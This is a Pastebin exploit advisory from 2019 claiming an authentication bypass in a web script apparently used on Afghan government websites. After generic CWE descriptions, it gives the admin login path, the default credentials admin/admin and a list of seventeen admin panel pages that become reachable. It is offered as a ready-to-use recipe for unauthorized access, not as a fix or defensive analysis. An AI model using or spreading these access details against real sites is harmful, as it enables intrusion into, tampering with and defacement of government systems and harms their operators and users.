API tools faq
paste
KingSkrupellos

Obaidullah Sulaimankhil Improper Authentication Vuln

KingSkrupellos
Mar 3rd, 2019
175
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.96 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################
  2.  
  3. # Exploit Title : Obaidullah Sulaimankhil Improper Authentication Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 03/03/2019
  7. # Vendor Homepage / Social Media : facebook.com/obaidullah.sulaimankhil
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : High
  11. # Vulnerability Type :
  12. CWE-287 [ Improper Authentication ]
  13. CWE-592 [ Authentication Bypass Issues ]
  14. CWE-305 [ Authentication Bypass by Primary Weakness ]
  15. CWE-288 [ Authentication Bypass Using an Alternate Path or Channel ]
  16. CWE-302 [ Authentication Bypass by Assumed-Immutable Data ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20. # Reference Link : cxsecurity.com/issue/WLB-2019030013
  21.  
  22. ####################################################################
  23.  
  24. # Information about Software and Owner :
  25. ************************************
  26. Obaidullah SulaimanKhil who is web developer in Afghanhistan and developed
  27.  
  28. a script with his name Obaidullah Software for Afghani Government Websites.
  29.  
  30. ####################################################################
  31.  
  32. # Impact :
  33. **********
  34. * When an actor claims to have a given identity, the software does not prove or insufficiently
  35.  
  36. proves that the claim is correct.
  37.  
  38. * The authentication algorithm is sound, but the implemented mechanism can be bypassed
  39.  
  40. as the result of a separate weakness that is primary to the authentication error.
  41.  
  42. * This product requires authentication, but the product has an alternate path or
  43.  
  44. channel that does not require authentication.
  45.  
  46. * The authentication scheme or implementation uses key data elements that are assumed
  47.  
  48. to be immutable, but can be controlled or modified by the attacker.
  49.  
  50. ####################################################################
  51.  
  52. # Authentication Bypass Exploit :
  53. *****************************
  54. Admin Panel Login Path :
  55. ***********************
  56. /Pages/AdminLogin.aspx
  57.  
  58. Admin username : admin
  59.  
  60. Admin password : admin
  61.  
  62. Usable Admin Control Panel Links :
  63. ********************************
  64. /Pages/frmWelcomeMessageAdmin.aspx
  65. /Pages/HistoryOfDMTVETAdmin.aspx
  66. /Pages/AboutDMTVETAdmin.aspx
  67. /Pages/HEDMAdmin.aspx
  68. /Pages/frmStaffAdmin.aspx
  69. /Pages/frmCeoMessageAdmin.aspx
  70. /Pages/frmSliderAdmin.aspx
  71. /Pages/frmDMTVETStructureAdmin.aspx
  72. /Pages/frmDMTVETReport.aspx
  73. /Pages/frmArticlesAdmin.aspx
  74. /Pages/frmVisionAdmin.aspx
  75. /Pages/frmPresentationsAdmin.aspx
  76. /Pages/frmInterviewsAdmin.aspx
  77. /Pages/frmAlbumAdmin.aspx
  78. /Pages/frmNewsAdmin.aspx
  79. /Pages/frmOthersAdmin.aspx
  80. /Pages/frmContactUsAdmin.aspx
  81.  
  82. ####################################################################
  83.  
  84. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  85.  
  86. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!